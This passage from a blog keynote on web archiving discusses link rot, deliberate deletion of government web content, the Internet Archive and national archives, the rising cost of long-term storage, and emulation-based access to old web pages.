50%/year. If it was, the loss rate after two years would be 75% rather than 60%.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote5">[5]</a></sup></blockquote>It isn't just that Web servers can go away or their contents be rewritten. Access to Web pages is mediated by the Domain Name Service (DNS), and they can become inaccessible because the domain owner fails to pay the registrar, or their DNS service, or for <a href="http://www.bbc.co.uk/programmes/p031zp5y">political reasons</a>:<br /><blockquote class="tr_bq"><b>In March 2010 every webpage with the domain address ending in .yu disappeared from the internet – the largest ever to be removed. This meant that the internet history of the former Yugoslavia was no longer available online.</b> Dr Anat Ben-David, from the Open University in Israel, has managed to rebuild about half of the lost pages – pages that document the Kosovo Wars, which have been called "the first internet war”.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote8">[8]</a></sup></blockquote>The terms "link rot" and "content drift" suggest randomness but in many cases they hide deliberate suppression or falsification of information. More than a decade ago, in <a href="http://blog.dshr.org/2007/06/why-preserve-e-journals-to-preserve.html">only my 6<sup>th</sup> blog post</a>, I wrote:<br /><blockquote class="tr_bq">Winston Smith in "1984" was <a href="http://en.wikipedia.org/wiki/Winston_Smith">"a clerk for the Ministry of Truth, where his job is to rewrite historical documents so that they match the current party line"</a>. George Orwell wasn't a prophet. Throughout history, governments of all stripes have found the need to employ Winston Smiths and the US government is no exception.</blockquote><div style="text-align: right;"></div><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-Yx8YEvyMzFE/Wbne0gkF2kI/AAAAAAAAD48/o4DGZoFylPEGHORtKH9t9kjfr6gEp-8eQCLcBGAs/s1600/o-BUSH-MISSION-ACCOMPLISHED-facebook.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="800" data-original-width="1600" height="100" src="https://1.bp.blogspot.com/-Yx8YEvyMzFE/Wbne0gkF2kI/AAAAAAAAD48/o4DGZoFylPEGHORtKH9t9kjfr6gEp-8eQCLcBGAs/s200/o-BUSH-MISSION-ACCOMPLISHED-facebook.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://i.huffpost.com/gen/2903624/images/o-BUSH-MISSION-ACCOMPLISHED-facebook.jpg">Source</a></td></tr></tbody></table><div style="text-align: right;"></div>Examples of Winston Smith's work are everywhere, <a href="http://news.wgbh.org/2017/04/06/innovation-hub-podcast/saving-facts-internet">such as</a>:<br /><blockquote class="tr_bq">George W. Bush’s “Mission Accomplished” press release. The <a href="http://web.archive.org/web/20030513162142/www.whitehouse.gov/news/releases/2003/05/iraq/20030501-15.html" target="_blank">first press release</a> read that ‘combat operations in Iraq have ceased.’ After a couple weeks, <a href="https://web.archive.org/web/20090117070743/http://www.whitehouse.gov/news/releases/2003/05/20030501-15.html" target="_blank">that was changed to</a> ‘major combat operations have ceased.’ And then,<a href="http://www.whitehouse.gov/news/releases/2003/05/20030501-15.html" target="_blank">&nbsp;the whole press release disappeared</a> off the White House’s website completely.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote7">[7]</a></sup></blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-TO5VTJlQbDs/WYNaP3aISCI/AAAAAAAAD1U/zqgwhQrnvTwTwP_c5-x_Hjs2LeM_ZMHfwCLcBGAs/s1600/liesbusS.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="385" data-original-width="650" height="118" src="https://4.bp.blogspot.com/-TO5VTJlQbDs/WYNaP3aISCI/AAAAAAAAD1U/zqgwhQrnvTwTwP_c5-x_Hjs2LeM_ZMHfwCLcBGAs/s200/liesbusS.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://boingboing.net/2017/07/05/referendumb.html">Source</a></td></tr></tbody></table><a href="https://boingboing.net/2017/07/05/referendumb.html">Britain has its Winston Smiths too</a>:<br /><blockquote class="tr_bq">One of the most enduring symbols of 2016's UK Brexit referendum was the huge red "battle bus" with its message, "We send the EU £350 million a week, let's fund our NHS instead. Vote Leave." ... Independent fact-checkers declared the £350 million figure to be a lie. <b>Within hours of the Brexit vote, the Leave campaign <a href="https://boingboing.net/2016/06/27/brexit-leave-campaign-kills-ol.html">scrubbed its website</a> of all its promises, and Nigel Farage <a href="https://boingboing.net/2016/06/24/the-morning-after-the-brexit-v.html">admitted that the £350 million was an imaginary figure</a> and that the NHS would not see an extra penny after Brexit.</b><sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote6">[6]</a></sup></blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-wtohlca85Yg/WYST7HqfCeI/AAAAAAAAD1s/WWmaSj2Y5T0_3nZrDtqDDLDqflWFxTDxwCLcBGAs/s1600/MAC38_VANISHING_CANADA_POST02.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="462" data-original-width="822" height="111" src="https://2.bp.blogspot.com/-wtohlca85Yg/WYST7HqfCeI/AAAAAAAAD1s/WWmaSj2Y5T0_3nZrDtqDDLDqflWFxTDxwCLcBGAs/s200/MAC38_VANISHING_CANADA_POST02.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://www.macleans.ca/news/canada/vanishing-canada-why-were-all-losers-in-ottawas-war-on-data/">Source</a></td></tr></tbody></table>Data on the Web is equally at risk. Under the Harper administration, Canadian librarians fought a <a href="http://www.macleans.ca/news/canada/vanishing-canada-why-were-all-losers-in-ottawas-war-on-data/">long, lonely struggle with their Winston Smiths</a>:<br /><blockquote class="tr_bq"><b>Protecting Canadians’ access to data is why Sam-Chin Li, a government information librarian at the University of Toronto, worked late into the night with colleagues in February 2013, frantically trying to archive the federal Aboriginal Canada portal before it disappeared on Feb. 12.</b> The decision to kill the site, which had thousands of links to resources for Aboriginal people, had been announced quietly weeks before; the librarians had only days to train with web-harvesting software.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote11">[11]</a></sup></blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-JaBW6i9RWZU/WYSu7N1eFLI/AAAAAAAAD2A/5CC1ytYZHZ4yEXSGFsj4pQULy48m-EEjgCLcBGAs/s1600/eot_wbm_summary-300x204.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="204" data-original-width="300" height="136" src="https://2.bp.blogspot.com/-JaBW6i9RWZU/WYSu7N1eFLI/AAAAAAAAD2A/5CC1ytYZHZ4yEXSGFsj4pQULy48m-EEjgCLcBGAs/s200/eot_wbm_summary-300x204.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://blog.archive.org/2017/05/09/over-200-terabytes-of-the-government-web-archived/">EOT Crawl Statistics</a></td></tr></tbody></table>A year ago, a similar but much larger emergency data rescue effort <a href="https://blog.archive.org/2017/05/09/over-200-terabytes-of-the-government-web-archived/">swung into action in the US</a>:<br /><blockquote class="tr_bq">Between Fall 2016 and Spring 2017, the Internet Archive archived over 200 terabytes of government websites and data. This includes over 100TB of public websites and over 100TB of public data from federal FTP file servers totaling, together, over 350 million URLs/files. </blockquote>Partly this was the collaborative "End of Term" (EOT) crawl that is organized at each change of Presidential term, but this time there was <a href="https://blog.archive.org/2017/05/09/over-200-terabytes-of-the-government-web-archived/">added urgency</a>:<br /><blockquote class="tr_bq">Through the EOT project’s public nomination form and through our collaboration with the <a href="https://www.datarefuge.org/">DataRefuge</a>,&nbsp;<a href="https://envirodatagov.org/">Environmental Data and Governance Initiative (EDGI)</a>, and other efforts, over 100,000 webpages or government datasets were nominated by citizens and preservationists for archiving.</blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-u-GemAdLwCg/WfiscB7QtrI/AAAAAAAAEAE/SqWfWN36bREOBz-oZ7q1E1MD45QhUMCfgCPcBGAYYCw/s1600/KoreanNova1473.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="533" data-original-width="533" height="200" src="https://4.bp.blogspot.com/-u-GemAdLwCg/WfiscB7QtrI/AAAAAAAAEAE/SqWfWN36bREOBz-oZ7q1E1MD45QhUMCfgCPcBGAYYCw/s200/KoreanNova1473.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://dx.doi.org/10.1038/nature23644">1473 nova remains</a></td></tr></tbody></table>Note the emphasis on datasets. It is important to keep scientific data, especially observations that are not repeatable, for the long term. A recent example is <a href="https://phys.org/news/2017-08-scientists-recover-nova-years-korean.html">Korean astronomers' records of a nova in 1437</a>, which provide strong evidence that:<br /><blockquote><b>"cataclysmic binaries"—novae, novae-like variables, and dwarf novae—are one and the same, not separate entities as has been previously suggested.</b> After an eruption, a nova becomes "nova-like," then a dwarf nova, and then, after a possible hibernation, comes back to being nova-like, and then a nova, and does it over and over again, up to 100,000 times over billions of years.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote12">[12]</a></sup></blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-xUjrn70bzew/WaixguNxcGI/AAAAAAAAD3c/rMwAtSbporwJSf07Bp9N12TDDctEr5nqgCLcBGAs/s1600/Shang_dynasty_inscribed_scapula.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1232" data-original-width="800" height="200" src="https://1.bp.blogspot.com/-xUjrn70bzew/WaixguNxcGI/AAAAAAAAD3c/rMwAtSbporwJSf07Bp9N12TDDctEr5nqgCLcBGAs/s200/Shang_dynasty_inscribed_scapula.jpg" width="129" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">By <a href="https://commons.wikimedia.org/wiki/User:BabelStone" title="User:BabelStone">BabelStone</a>, <a href="http://creativecommons.org/licenses/by-sa/3.0" title="Creative Commons Attribution-Share Alike 3.0">CC BY-SA 3.0</a><br /><a href="https://commons.wikimedia.org/w/index.php?curid=16189953">Source</a></td></tr></tbody></table>580 years is peanuts. An example more than 5 times older is from China. In the <a href="http://blog.dshr.org/2014/12/talk-at-fall-cni.html">Shang dynasty</a>:<br /><blockquote>astronomers inscribed eclipse observations on animal bones. About 3200 years later, researchers used these records to estimate that the accumulated clock error was about 7 hours. From this they derived a value for the <a href="http://dx.doi.org/10.1007/BF00879584">viscosity of the Earth's mantle</a> as it rebounds from the weight of the glaciers.</blockquote>Today, those eclipse records would be on the Web, not paper or bone. Will astronomers 3200 or even 580 years from now be able to use them?<br /><h3>What have we learned about archiving the Web?</h3>I hope I've convinced you that a society whose knowledge base is on the Web is doomed to forget its past unless something is done to preserve it<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote18">[18]</a></sup>. Preserving Web content happens in three stages: <br /><ul><li>Collection</li><li>Preservation</li><li>Access</li></ul><h4>What have we learned about collection?</h4>In the wake of NASA's <a href="http://ws-dl.blogspot.com/2013/03/2013-03-22-ntrs-web-archives-and-why-we.html">March 2013 takedown of their <i>Technical Report Server</i></a> James Jacobs, Stanford's Government Documents librarian, <a href="http://freegovinfo.info/node/3900">stressed the importance of collecting Web content</a>:<br /><blockquote><b>pointing to web sites is much less valuable and much more fragile than acquiring copies of digital information and building digital collections that you control.</b> The OAIS reference model for long term preservation makes this a requirement ... “Obtain sufficient control of the information provided to the level needed to ensure Long-Term Preservation.” <b>Pointing to a web page or PDF at nasa.gov is not obtaining any control.</b></blockquote>Memory institutions need to make their own copies of Web content. Who is doing this?<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-6V9zH0js0Bc/Wa23r0inZZI/AAAAAAAAD4c/PgbZy4r4Vpc-qJITI90RpvkmjO5qdNnmgCPcBGAYYCw/s1600/300-Funston.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1024" data-original-width="1280" height="160" src="https://4.bp.blogspot.com/-6V9zH0js0Bc/Wa23r0inZZI/AAAAAAAAD4c/PgbZy4r4Vpc-qJITI90RpvkmjO5qdNnmgCPcBGAYYCw/s200/300-Funston.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://en.wikipedia.org/wiki/File:Christian_science_church122908_02.jpg">Internet Archive HQ</a></td></tr></tbody></table>The Internet Archive is by far the largest and most used Web archive, having been trying to collect the whole of the Web for more than two decades. Its "crawlers" start from a large set of "seed" web pages and follow links from them to other pages, then follow those links, according to a set of "crawl rules". Well-linked-to pages will be well represented; they may be important or they may be "link farms". Two years ago <a href="https://www.forbes.com/sites/kalevleetaru/2015/11/16/how-much-of-the-internet-does-the-wayback-machine-really-archive/">Kalev Leetaru wrote</a>:<br /><blockquote class="tr_bq"><b>of the top 15 websites with the most snapshots taken by the Archive thus far this year, one is an alleged former movie pirating site, one is a Hawaiian hotel, two are pornography sites and five are online shopping sites.</b> The second-most snapshotted homepage is of a Russian autoparts website and the eighth-most-snapshotted site is a parts supplier for trampolines.</blockquote>The Internet Archive's highly automated collection process may collect a lot of unimportant stuff, but it is the best we have at collecting the "Web at large"<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote25">[25]</a></sup>. The Archive's recycled church in San Francisco, and its second site nearby sustain about 40Gb/s outbound and 20Gb/s inbound serving about 4M unique IPs/day. Each stores over 3*10<sup>11</sup> Web pages, among <a href="https://archive.org/about/">much other content</a>. The Archive has been for many years in the <a href="https://www.alexa.com/siteinfo/archive.org">top 300 Web sites</a> in the world. For comparison, the Library of Congress typically ranks between 4000 and 6000.<br /><br />Network effects mean that technology markets in general and the Web in particular are <a href="http://www.amazon.com/Increasing-Returns-Dependence-Economics-Cognition/dp/0472064967">winner-take-all markets</a>. Just like Google in search, the Internet Archive is the winner in its market. Other institutions can't compete in archiving the whole Web, they must focus on curated collections.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-yPKZ0qeUBCM/WeeOlBEoEbI/AAAAAAAAD-k/lzozXlx1ZLgKJ9RV3iOWFeQPjMtI1vEnQCEwYBhgL/s1600/UK-Web-Archive.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="661" data-original-width="1004" height="131" src="https://3.bp.blogspot.com/-yPKZ0qeUBCM/WeeOlBEoEbI/AAAAAAAAD-k/lzozXlx1ZLgKJ9RV3iOWFeQPjMtI1vEnQCEwYBhgL/s200/UK-Web-Archive.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://www.webarchive.org.uk/ukwa/advancedsearch">UK Web Archive</a></td></tr></tbody></table>The British Library, among other national libraries, has been <a href="http://britishlibrary.typepad.co.uk/webarchive/2015/09/ten-years-of-the-uk-web-archive-what-have-we-saved.html">collecting their "national Web presence"</a> for more than a decade. One problem is defining "national Web presence". Clearly, it is more than the .uk domain, but how much more? The <a href="http://arquivo.pt/">Portuguese Web Archive</a> defines it as the .pt domain plus content embedded in or redirected from the .pt domain. That wouldn't work for many countries, where important content is in top-level domains such as .com.<br /><br />Dr. Regan Murphy Kao of Stanford's East Asian Library <a href="https://library.stanford.edu/blogs/stanford-libraries-blog/2017/08/preserving-ephemeral-reflections-archiving-japanese-websites">described their approach to Web collecting</a>:<br /><blockquote class="tr_bq"><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-2P0kMBcY_8E/WYI0E3ZKmXI/AAAAAAAAD0Y/-edajb730bgOHm2QJwMbe_3QDxXc8CkgACLcBGAs/s160/_92604136_maonowafterchemo.png.jpeg" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="371" data-original-width="660" height="111" src="https://1.bp.blogspot.com/-2P0kMBcY_8E/WYI0E3ZKmXI/AAAAAAAAD0Y/-edajb730bgOHm2QJwMbe_3QDxXc8CkgACLcBGAs/s200/_92604136_maonowafterchemo.png.jpeg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://www.bbc.com/news/magazine-37861457">Mao Kobayashi</a></td></tr></tbody></table>we sought to archive a limited number of blogs of ground-breaking, influential figures – people whose writings were widely read and represented a new way of approaching a topic. One of the people we choose was Mao Kobayashi. ... Mao broke with tradition and openly described her experience with cancer in a blog that gripped Japan. She harnessed this new medium to define her life rather than allow cancer to define it.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote3">[3]</a></sup></blockquote><div class="separator" style="clear: both; text-align: center;"></div>Curated collections have a problem. What made the Web transformational was the links (see Google's <a href="https://en.wikipedia.org/wiki/PageRank">PageRank</a>). Viewed in isolation, curated collections break the links and subtract value. But, viewed as an adjunct to broad Web archives they can add value in two ways:<br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-SgFWjUZusvg/VPDdIgc7FwI/AAAAAAAACrQ/0dURqV-0gCQJAH0n-idyHxNwv3sRyz7CgCPcBGAYYCw/s1600/AndyJacksonIDCC15.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="717" data-original-width="1050" height="136" src="https://3.bp.blogspot.com/-SgFWjUZusvg/VPDdIgc7FwI/AAAAAAAACrQ/0dURqV-0gCQJAH0n-idyHxNwv3sRyz7CgCPcBGAYYCw/s200/AndyJacksonIDCC15.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://www.dcc.ac.uk/sites/default/files/documents/IDCC15/Presentations%20Day%202/B3/IDCC15-UKWA-Open-Data.pdf">UK Web Archive link analysis</a></td></tr></tbody></table><ul><li>By providing quality assurance, using greater per-site resources to ensure that important Web resources are fully collected.</li><li>By providing researchers better access to preserved important Web resources than the Internet Archive can. For example, better text search or data mining. The British Library has been a <a href="http://www.dcc.ac.uk/webfm_send/1911">leader in this area</a>.</li></ul>Nearly one-third of a trillion Web pages at the Internet Archive is impressive, but in 2014 I reviewed the research into <a href="http://blog.dshr.org/2014/03/the-half-empty-archive.html">how much of the Web was then being collected</a><sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote13">[13]</a></sup> and concluded:<br /><blockquote class="tr_bq">Somewhat less than half ... Unfortunately, there are a number of reasons why this simplistic assessment is wildly optimistic.</blockquote>Costa <i>et al</i> ran <a href="https://doi.org/10.1007/s00799-016-0171-9">surveys in 2010 and 2014 and concluded in 2016</a>: <br /><blockquote class="tr_bq"><b>during the last years there was a significant growth in initiatives and countries hosting these initiatives, volume of data and number of contents preserved.</b> While this indicates that the web archiving community is dedicating a growing effort on preserving digital information, <b>other results presented throughout the paper raise concerns such as the small amount of archived data in comparison with the amount of data that is being published online</b>.</blockquote>I <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-1.html">revisited this topic</a> earlier this year and concluded that we were losing ground rapidly. Why is this? The reason is that collecting the Web is expensive, whether it uses human curators, or large-scale technology, and that <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-2.html">Web archives are pathetically under-funded</a>:<br /><blockquote class="tr_bq">The <a href="https://www.guidestar.org/profile/94-3242767">Internet Archive's budget</a> is in the region of $15M/yr, about half of which goes to Web archiving. The budgets of all the other public Web archives might add another $20M/yr. The total worldwide spend on archiving Web content is probably less than $30M/yr, for content that cost hundreds of billions to create<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote19">[19]</a></sup>.</blockquote><a href="http://blog.dshr.org/2014/03/the-half-empty-archive.html">My rule of thumb</a> has been that collection takes about half the lifetime cost of digital preservation, preservation about a third, and access about a sixth. So the world may spend only about $15M/yr collecting the Web.<br /><br />As an Englishman it is important in this forum I also observe that, like the Web itself, archiving is biased towards English. For example, pages in Korean are less than half as likely to be collected as pages in English<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote20">[20]</a></sup>.<br /><h4>What have we learned about preservation?</h4>Since Jeff Rothenberg's seminal 1995 <a href="http://www.jstor.org/stable/24980135"><i>Ensuring the Longevity of Digital Documents</i></a> it has been commonly assumed that digital preservation revolved around the problem of formats becoming obsolete, and thus their content becoming inaccessible. But in the Web world <a href="http://blog.dshr.org/2012/10/formats-through-time.html">formats go obsolete very slowly if at all</a>. The real problem is simply <a href="http://blog.dshr.org/2007/06/petabyte-for-century.html">storing enough bits reliably enough</a> for the long term.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote9">[9]</a></sup><br /><br /><div class="separator" style="clear: both; text-align: center;"></div><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-ftr_yWIaFF0/UGiy2qCbD-I/AAAAAAAABgE/yzw3ff5LTbEPvtGMoLhdjEHqKgUC0C_MwCPcBGAYYCw/s1600/Hard_drive_capacity_over_time.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="400" data-original-width="600" height="133" src="https://4.bp.blogspot.com/-ftr_yWIaFF0/UGiy2qCbD-I/AAAAAAAABgE/yzw3ff5LTbEPvtGMoLhdjEHqKgUC0C_MwCPcBGAYYCw/s200/Hard_drive_capacity_over_time.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Kryder's Law</td></tr></tbody></table>Or rather, since we actually know how to store bits reliably, it is finding enough money to store enough bits reliably enough for the long term. This used to be a problem we could ignore. Hard disk, a 60-year-old technology, is the dominant medium for bulk data storage. It had a remarkable run of more than 30 years of 30-40%/year price declines; Kryder's Law, the disk analog of Moore's Law. The rapid cost decrease meant that if you could afford to store data for a few years, you could afford to store it "forever".<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-ftIigC27xmM/UxkvyExYfNI/AAAAAAAACjU/I8tZ1VfdAekB-6bQ4NgNRxyTuPPkbcIMACPcBGAYYCw/s1600/disk_price_fall.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="600" data-original-width="800" height="150" src="https://4.bp.blogspot.com/-ftIigC27xmM/UxkvyExYfNI/AAAAAAAACjU/I8tZ1VfdAekB-6bQ4NgNRxyTuPPkbcIMACPcBGAYYCw/s200/disk_price_fall.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Kryder's Law breakdown</td></tr></tbody></table>Just as Moore's Law slowed dramatically as the technology approached the physical limits, so did Kryder's Law. The slowing started in 2010, and was followed by the 2011 floods in Thailand, causing disk prices to double and not recover for 3 years. In 2014 we predicted Kryder rates going forward between 10-20%, the red lines on the graph, <a href="http://blog.dshr.org/2014/03/the-half-empty-archive.html">meaning that</a>:<br /><blockquote class="tr_bq">If the industry projections pan out ... by 2020 disk costs per byte will be between <i>130 and 300 times higher</i> than they would have been had Kryder's Law continued.</blockquote><div class="separator" style="clear: both; text-align: center;"></div><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-8PdsWOGOUSw/WZoRoWgqbLI/AAAAAAAAD2k/d69WScG1zjc9wGmcGGlUhV-vIUYrfW91ACPcBGAYYCw/s1600/EcoModelGraph.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="600" data-original-width="800" height="150" src="https://4.bp.blogspot.com/-8PdsWOGOUSw/WZoRoWgqbLI/AAAAAAAAD2k/d69WScG1zjc9wGmcGGlUhV-vIUYrfW91ACPcBGAYYCw/s200/EcoModelGraph.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://blog.dshr.org/2017/08/economic-model-of-long-term-storage.html">Economic model output</a></td></tr></tbody></table><a href="http://blog.dshr.org/2017/07/patting-myself-on-back.html">So far, our prediction has proved correct</a>, which is bad news. The graph shows the endowment, the money which, deposited with the data and invested at interest, will cover the cost of storage "forever". It increases strongly as the Kryder rate falls below 20%, which it has. <a href="http://blog.dshr.org/2016/12/the-medium-term-prospects-for-long-term.html">Absent unexpected technological change</a>, the cost of long-term data storage is far higher than most people realize.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote10">[10]</a></sup><br /><h4>What have we learned about access?</h4>There is clearly a demand for access to the Web's history. The Internet Archive's Wayback Machine provides well over 1M users/day access to it.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-s2_AFgyOjxU/VpaDdD5o-5I/AAAAAAAAC4c/EhLW8T_IiLA523J0Fjbr1Nk889bOCHJ2ACPcBGAYYCw/s1600/JinxPuvWayback.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="820" data-original-width="815" height="200" src="https://2.bp.blogspot.com/-s2_AFgyOjxU/VpaDdD5o-5I/AAAAAAAAC4c/EhLW8T_IiLA523J0Fjbr1Nk889bOCHJ2ACPcBGAYYCw/s200/JinxPuvWayback.png" width="198" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1995 Web page</td></tr></tbody></table>On Jan 11<sup>th</sup> 1995, the late <a href="https://en.wikipedia.org/wiki/Mark_Weiser">Mark Weiser</a>, CTO of Xerox PARC, created <a href="http://blog.dshr.org/2016/01/the-internet-is-for-cats.html">Nijinksy and Pavlova's Web page</a>, perhaps the start of the Internet's obsession with cat pictures. You can view this important historical artifact by pointing your browser to the Internet Archive's Wayback Machine, which captured the page 39 times between <a href="https://web.archive.org/web/19981201080657/http://www.ubiq.com/hypertext/weiser/Kitten.html">Dec 1<sup>st</sup> 1998</a> and <a href="https://web.archive.org/web/20080511175020/http://www.ubiq.com/hypertext/weiser/Kitten.html">May 11<sup>th</sup> 2008</a>. What you see using your modern browser is perfectly usable, but it is slightly different from what Mark saw when he finished the page over 22 years ago.<br /><br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-07JaPaN9rhk/VpaGhKx_uEI/AAAAAAAAC4o/iYxSfzXIXmwnI_w0MikaovBicnWu5LOLwCPcBGAYYCw/s1600/JunxAndPuvOldwebToday.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="912" data-original-width="1376" height="132" src="https://3.bp.blogspot.com/-07JaPaN9rhk/VpaGhKx_uEI/AAAAAAAAC4o/iYxSfzXIXmwnI_w0MikaovBicnWu5LOLwCPcBGAYYCw/s200/JunxAndPuvOldwebToday.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://blog.dshr.org/2016/01/the-internet-is-for-cats.html">Via oldweb.today</a></td></tr></tbody></table><a href="http://blog.dshr.org/2016/01/guest-post-ilya-kreymer-on-oldwebtoday.html">Ilya Kreymer</a> used two important recent developments in digital preservation<br />to build <a href="http://oldweb.today/">oldweb.today</a> , a Web site that allows you to view preserved Web content using the browser that its author would have. The first is that <a href="https://mellon.org/Rosenthal-Emulation-2015">emulation &amp; virtualization techniques</a> have advanced to allow Ilya to create on-the-fly behind the Web page a virtual machine running, in this case, a 1998 version of Linux with a 1998 version of the Mosaic browser visiting the page. Note the different fonts and background. This is very close to what Mark would have seen in 1995.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-vdxcR1a76bo/WcHqEbF5phI/AAAAAAAAD5Y/z4YkOJZm0UcKF54DttMOFXEppcmDYRgrwCLcBGAs/s1600/stanford-ukwa-archive-it.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="333" data-original-width="359" height="185" src="https://4.bp.blogspot.com/-vdxcR1a76bo/WcHqEbF5phI/AAAAAAAAD5Y/z4YkOJZm0UcKF54DttMOFXEppcmDYRgrwCLcBGAs/s200/stanford-ukwa-archive-it.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://netpreserveblog.wordpress.com/2016/01/08/memento-help-us-route-uri-lookups-to-the-right-archives/">Source</a></td></tr></tbody></table>The Internet 